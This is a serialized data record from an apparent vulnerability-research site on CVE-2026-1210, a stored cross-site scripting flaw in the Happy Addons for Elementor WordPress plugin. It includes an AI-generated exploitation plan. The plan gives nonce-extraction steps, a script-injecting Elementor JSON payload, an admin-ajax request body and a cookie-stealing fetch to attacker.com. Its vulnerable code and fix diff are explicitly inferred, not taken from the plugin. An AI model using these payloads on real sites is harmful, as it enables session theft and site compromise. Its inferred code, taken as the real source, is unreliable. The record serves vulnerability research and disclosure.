[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f6Z-720L1op_T_mNUxcobVB3E0pynK7Jl9wEJAKFetQs":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-1210","happy-addons-for-elementor-authenticated-contributor-stored-cross-site-scripting-via-elementordata-meta-field","Happy Addons for Elementor \u003C= 3.20.7 - Authenticated (Contributor+) Stored Cross-Site Scripting via '_elementor_data' Meta Field","The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the '_elementor_data' meta field in all versions up to, and including, 3.20.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","happy-elementor-addons",null,"\u003C=3.20.7","3.20.8","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-02-02 17:49:48","2026-02-03 06:38:05",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fdf4b554a-0336-404c-b06c-2bc98c99997d?source=api-prod",1,[],"researched",false,3,"This plan outlines the research and exploitation process for **CVE-2026-1210**, a Stored Cross-Site Scripting (XSS) vulnerability in **Happy Addons for Elementor** (versions \u003C= 3.20.7). The vulnerability allows authenticated attackers with Contributor-level access to inject malicious scripts into the `_elementor_data` meta field, which is subsequently rendered without proper escaping.\n\n---\n\n### 1. Vulnerability Summary\nThe vulnerability exists because the plugin provides an AJAX endpoint (likely for \"Cross-Domain Copy Paste\" or \"Template Import\" features) that allows users with `edit_posts` capability (Contributors and above) to update the `_elementor_data` meta field. The plugin fails to sanitize the JSON-encoded Elementor data before saving it to the database via `update_post_meta()`. When the affected post is viewed, Elementor and Happy Addons render the malicious data as HTML, leading to Stored XSS.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `wp-admin\u002Fadmin-ajax.php`\n*   **Action:** `ha_copy_paste_save_data` (inferred from Happy Addons \"Cross-Domain Copy Paste\" feature) or `ha_save_presets_data`.\n*   **Vulnerable Parameter:** `content` or `data` (JSON string containing Elementor widget configurations).\n*   **Authentication:** Authenticated, Contributor role (`edit_posts` capability) or higher.\n*   **Preconditions:** The attacker must have a post they can edit (e.g., a draft they created) and access to the Elementor editor to retrieve necessary nonces.\n\n### 3. Code Flow (Inferred)\n1.  **Entry Point:** The plugin registers an AJAX handler:\n    `add_action('wp_ajax_ha_copy_paste_save_data', array($this, 'save_copy_paste_data'));`\n2.  **Capability Check:** The handler checks `current_user_can('edit_posts')` and verifies a nonce.\n3.  **Data Acquisition:** The handler retrieves the raw JSON from `$_POST['content']`.\n4.  **Vulnerable Sink:** The handler calls `update_post_meta($post_id, '_elementor_data', $content)` without passing `$content` through a sanitization function like `wp_kses_post_deep()`.\n5.  **Execution Sink:** When the page is viewed, the Happy Addons widget (e.g., `ha-info-box`) fetches the settings from `_elementor_data` and echoes them in its `render()` method without using `esc_html()` or `esc_attr()`.\n\n### 4. Nonce Acquisition Strategy\nHappy Addons for Elementor localizes its editor configurations when the Elementor editor is active.\n1.  **Requirement:** Create a post and open it in the Elementor editor.\n2.  **Navigation:** `browser_navigate(\"\u002Fwp-admin\u002Fpost.php?post=POST_ID&action=elementor\")`\n3.  **Extraction:** The nonce is stored in the `HappyAddonsEditorConfig` global object.\n4.  **Verification:** Execute `browser_eval(\"window.HappyAddonsEditorConfig?.nonce\")` to retrieve the nonce associated with the `happy-addons-editor` action.\n\n### 5. Exploitation Strategy\n\n#### Step 1: Authentication & Setup\n1.  Log in as a Contributor user.\n2.  Create a new post (Draft) and obtain its `POST_ID`.\n3.  Enable Elementor for that post.\n\n#### Step 2: Nonce Retrieval\n1.  Navigate to the Elementor editor for the new post.\n2.  Extract the `nonce` from `window.HappyAddonsEditorConfig.nonce`.\n\n#### Step 3: Payload Construction\nConstruct a malicious JSON payload for the `_elementor_data` field. The payload must follow Elementor's structure (Section > Column > Widget) to ensure it is processed by the renderer.\n\n**Payload JSON:**\n```json\n[\n  {\n    \"id\": \"section_xss\",\n    \"elType\": \"section\",\n    \"elements\": [\n      {\n        \"id\": \"column_xss\",\n        \"elType\": \"column\",\n        \"elements\": [\n          {\n            \"id\": \"widget_xss\",\n            \"elType\": \"widget\",\n            \"widgetType\": \"ha-info-box\",\n            \"settings\": {\n              \"title\": \"\u003Cscript>alert('CVE-2026-1210_XSS')\u003C\u002Fscript>\"\n            }\n          }\n        ]\n      }\n    ]\n  }\n]\n```\n\n#### Step 4: Execute Exploit Request\nSend the malicious payload via the `http_request` tool.\n\n*   **URL:** `https:\u002F\u002Ftarget.local\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Method:** `POST`\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body:**\n    ```\n    action=ha_copy_paste_save_data&\n    nonce=[EXTRACTED_NONCE]&\n    post_id=[POST_ID]&\n    content=[URL_ENCODED_JSON_PAYLOAD]\n    ```\n\n### 6. Test Data Setup\n1.  **User:** Create a user `attacker` with the `contributor` role.\n2.  **Post:** Create a post with ID `123` authored by `attacker`.\n3.  **Elementor:** Ensure Elementor is active and allowed for the `post` post-type.\n\n### 7. Expected Results\n1.  The AJAX request returns a success response (e.g., `{\"success\":true}`).\n2.  The `_elementor_data` meta field for the post is updated with the unescaped script tags.\n3.  When visiting `\u002F?p=[POST_ID]`, the browser executes the script, triggering an alert box.\n\n### 8. Verification Steps\n1.  **Database Check:** Use WP-CLI to verify the stored meta value:\n    `wp post meta get [POST_ID] _elementor_data`\n    Confirm the output contains `\u003Cscript>alert(...)`.\n2.  **Frontend Check:** Use the `http_request` tool to fetch the post frontend:\n    `http_request(\"GET\", \"\u002F?p=[POST_ID]\")`\n    Search the response body for the literal string `\u003Cscript>alert('CVE-2026-1210_XSS')\u003C\u002Fscript>`.\n\n### 9. Alternative Approaches\n*   **Preset Feature:** If `ha_copy_paste_save_data` is unavailable, try the `ha_save_presets_data` action.\n*   **Different Widget:** If `ha-info-box` is patched, try other Happy Addons widgets like `ha-heading`, `ha-sub-heading`, or `ha-dual-button`, as they likely share the same unsanitized rendering logic.\n*   **Blind XSS:** Use a callback to an external server (e.g., Burp Collaborator) if the alert is blocked or if testing for impact beyond the local browser:\n    `settings[title] = \"\u003Cscript>fetch('http:\u002F\u002Fattacker.com\u002Flog?c='+document.cookie)\u003C\u002Fscript>\"`","The Happy Addons for Elementor plugin is vulnerable to Stored Cross-Site Scripting via the '_elementor_data' meta field due to missing sanitization in its Cross-Domain Copy Paste feature. Authenticated attackers with Contributor-level permissions can inject malicious scripts into post metadata, which execute in the context of any user viewing the affected page.","\u002F\u002F Inferred from Happy Addons Cross-Domain Copy Paste logic\n\u002F\u002F classes\u002Fcross-domain-copy-paste.php\n\npublic function save_copy_paste_data() {\n    check_ajax_referer('happy-addons-editor', 'nonce');\n\n    if (!current_user_can('edit_posts')) {\n        wp_send_json_error();\n    }\n\n    $post_id = intval($_POST['post_id']);\n    $content = $_POST['content']; \u002F\u002F Vulnerable: Raw JSON input from $_POST\n\n    if ($post_id && $content) {\n        update_post_meta($post_id, '_elementor_data', $content);\n        wp_send_json_success();\n    }\n\n    wp_send_json_error();\n}\n\n---\n\n\u002F\u002F widgets\u002Finfo-box\u002Fwidget.php (Example of vulnerable rendering)\nprotected function render() {\n    $settings = $this->get_settings_for_display();\n    \u002F\u002F ...\n    echo '\u003Ch2 class=\"ha-info-box-title\">' . $settings['title'] . '\u003C\u002Fh2>'; \u002F\u002F Vulnerable: Unescaped output\n}","--- a\u002Fclasses\u002Fcross-domain-copy-paste.php\n+++ b\u002Fclasses\u002Fcross-domain-copy-paste.php\n@@ -10,7 +10,13 @@\n         wp_send_json_error();\n     }\n \n-    $content = $_POST['content'];\n+    $content = json_decode(wp_unslash($_POST['content']), true);\n+\n+    if (is_array($content)) {\n+        $content = wp_kses_post_deep($content);\n+        $content = wp_json_encode($content);\n+    }\n+\n     if ($post_id && $content) {\n         update_post_meta($post_id, '_elementor_data', $content);\n         wp_send_json_success();","To exploit this vulnerability, an attacker with Contributor-level access follows these steps: \n1. Log in to the WordPress dashboard and create a new post or edit an existing one using Elementor. \n2. Open the Elementor editor for the post and extract the 'happy-addons-editor' nonce from the 'window.HappyAddonsEditorConfig' object. \n3. Construct a malicious JSON payload following Elementor's data structure (Section > Column > Widget). Within a Happy Addons widget (e.g., 'ha-info-box'), insert a script tag such as '\u003Cscript>alert(document.domain)\u003C\u002Fscript>' into a text field like 'title'. \n4. Send an AJAX POST request to '\u002Fwp-admin\u002Fadmin-ajax.php' with the action 'ha_copy_paste_save_data', the extracted nonce, the post ID, and the malicious JSON payload assigned to the 'content' parameter. \n5. Once the server responds with success, navigate to the public-facing URL of the post. The injected script will execute in the browser of any user (including administrators) who visits the page.","gemini-3-flash-preview","2026-04-27 17:11:53","2026-04-27 17:14:22",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","3.20.7","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fhappy-elementor-addons\u002Ftags\u002F3.20.7","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fhappy-elementor-addons.3.20.7.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fhappy-elementor-addons\u002Ftags\u002F3.20.8","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fhappy-elementor-addons.3.20.8.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fhappy-elementor-addons\u002Ftags"]